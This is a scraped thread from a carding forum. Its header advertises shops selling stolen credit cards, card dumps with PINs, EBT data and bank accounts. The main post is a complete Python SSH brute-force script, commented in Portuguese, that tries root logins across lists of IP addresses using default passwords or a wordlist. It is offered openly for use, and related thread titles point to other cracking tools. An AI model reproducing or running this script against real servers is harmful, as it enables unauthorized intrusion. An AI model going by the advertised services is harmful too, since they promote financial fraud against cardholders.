BPC Squad Bank Paypal And Cards | Carders Forum | Carding Forum

- Advertisement Area (For purchasing Ads or Banner contact ) Jabber [email protected] -(Telegram : @bpclover) -



Jerry's Store Excellent bases | AVS checker
Cerberux.CC The king shop with new checker feature attached + high quality spam cards direct from inbox.
Algae For Sale Global rare CC, Best Quality
CC+CVV Private Base Wholesale & Retail | Rare BINs
Bankman.biz Merchants, Banks US/EU, Crypto
BIGSTACKS DUMPS+PINS, EBT+PINS, CC+CVV




- Advertisement Area (For purchasing Ads or Banner contact )-Jabber-[email protected]

Best Regards
BPC Team







-BPCFORUM-  Registration Opened ####.


We are the Best one Carding Forum on Internet And you choose the right place to start Carding World so Enjoy your time with bpc , Also bpc is not responsible for any kind of post Because we are not a post owner So all stuff you will use at your own risk and If you face any kind of problem please feel free to contact with us.. Telegram : @bpclover
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5


Brute SSH Python 2016
#1
Code:
#!/usr/bin/env python
#-*- coding: utf-8 -*-

import os, sys, argparse
try:
   import paramiko
except:
   os.system("clear")
   print "Instale a lib paramiko "
   quit()

#Conecções....
user, porta = "root", 22
ssh = paramiko.SSHClient()
ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(paramiko.MissingHostKeyPolicy())
def Sistema():
   if sys.platform != 'linux2':
       os.system("cls")
   else:
       os.system("clear")
def Banner():
   print """\033[1;37m
  ██████╗ ██████╗ ██╗   ██╗████████╗███████╗    ███████╗███████╗██╗  ██╗
  ██╔══██╗██╔══██╗██║   ██║╚══██╔══╝██╔════╝    ██╔════╝██╔════╝██║  ██║
  ██████╔╝██████╔╝██║   ██║   ██║   █████╗      ███████╗███████╗███████║
  ██╔══██╗██╔══██╗██║   ██║   ██║   ██╔══╝      ╚════██║╚════██║██╔══██║
  ██████╔╝██║  ██║╚██████╔╝   ██║   ███████╗    ███████║███████║██║  ██║
  ╚═════╝ ╚═╝  ╚═╝ ╚═════╝    ╚═╝   ╚══════╝    ╚══════╝╚══════╝╚═╝  ╚═╝\033[0m
\033[0;31m      By ./ChmoD
  \033[0m"""
def Lista(ips):
   Sistema()
   Banner()
   for ip in ips:
       ip = ip.replace("\n", "").replace("\r", "")
       print "\033[1;31m-------------------: Testando: "+ip
       for senha in ['admin', 'root', 'admin123', '@adm1in', '@admin', 'ubnt']:
           try:
               ssh.connect(ip, port=porta, username=user, password=senha)
               print "\033[1;32mPow! Pow! Pow! senha do Server: "+senha+"\033[0m"
               break
           except KeyboardInterrupt:
               print "\033[1;37m\nCnacelando Brute Force...",
               print "Bye\033[0m"
               quit()
           except paramiko.AuthenticationException, error:
               print "\033[1;35mPassword incorreto: "+senha
           except:
               print "\033[1;37mConexão negada!\033[0m"
               break
def Senhas(senha, ip):
   Sistema()
   Banner()
   print "\033[1;31m-------------------- Brute Force: "+ip
   for i in senha:
       i = i.replace("\n", "").replace("\r", "")
       try:
           ssh.connect(ip, port=porta, username=user, password=i)
           print "\033[1;32mPow! PoW! Pow! senha do Server: "+senha+"\033[0m"
           break
       except KeyboardInterrupt:
           print "\033[1;37m\nCnacelando Brute Force...",
           print "Bye\033[0m"
           quit()
       except paramiko.AuthenticationException, error:
           print "\033[1;35mPassword incorreto: "+i+"\033[0m"
       except:
           print "\033[1;37mConexão negada!\033[0m"
           break
def Argumentos():
   parse = argparse.ArgumentParser()
   parse.add_argument("--tipo", action="store", dest="tipo", required=True, help="Escolha o tipo de Brute Force, senha ou lista...")
   parse.add_argument("--senha", action="store", dest="senha", help="Caminho da WordList com as senhas.")
   parse.add_argument("--ip", action="store", dest="ip", help="IP que será realizado o Brute Force com a lista de senahs...")
   parse.add_argument("--lista", action="store", dest="lista", help="Caminho da WordList com IP's..")
   args = parse.parse_args()
   if args.tipo.lower() == "lista":
       lista = args.lista
       lista = open(lista, "r").readlines()
       Lista(lista)
   elif  args.tipo.lower() == 'senha':
       senha = args.senha
       senha = open(senha, "r").readlines()
       ip = args.ip
       Senhas(senha, ip)
   else:
       print """
       Use "./BruteSSH --tipo lista --lista listaIP.txt"
       Esses exemplo usa uma lista de SSH para tentar o Brute Force com palavras padrões.
       Ou "./BruteSSH.py --tipo senha --senha listaSenhas.txt --ip 192.168.0.1"
       Esse já tenta o Brute Force em um determinado IP com uma lista de senha que o usuário dispõe.

       """
Sistema()
Argumentos()
Find Rate
Reply


Digg   Delicious   Reddit   Facebook   Twitter   StumbleUpon  


Possibly Related Threads…
Thread Author Replies Views Last Post
  Absolute Python beginer [Ace] 12 12,040 06-02-2018, 08:37 AM
Last Post: whatpigs
  Patator v0.5 Python - Best Cracker subject0 1 4,050 04-23-2018, 12:49 AM
Last Post: bobhojunk
  Python Pocket reference [Ace] 3 4,753 04-23-2018, 12:46 AM
Last Post: bobhojunk
  Smtp Checker Python subject0 2 5,902 09-14-2017, 01:33 PM
Last Post: consuela
  Learning Python [Ace] 6 7,247 02-14-2017, 01:56 PM
Last Post: alioujalan
  Python Fast [Ace] 11 9,257 02-09-2017, 11:59 PM
Last Post: alioujalan
  Start Learning - Python Ruby PHP Pentest And Other subject0 2 3,446 01-22-2017, 11:41 PM
Last Post: Hern314
  Enumerate Users Wordpress 2016 Python subject0 0 2,807 11-20-2016, 02:49 PM
Last Post: subject0
  Ip Range Maker Python subject0 0 2,932 11-20-2016, 12:24 PM
Last Post: subject0
Thumbs Up Ip Safe Python - Spammers Hackers Carders subject0 0 2,676 11-19-2016, 09:14 PM
Last Post: subject0



Users browsing this thread:
1 Guest(s)

 
Carding forum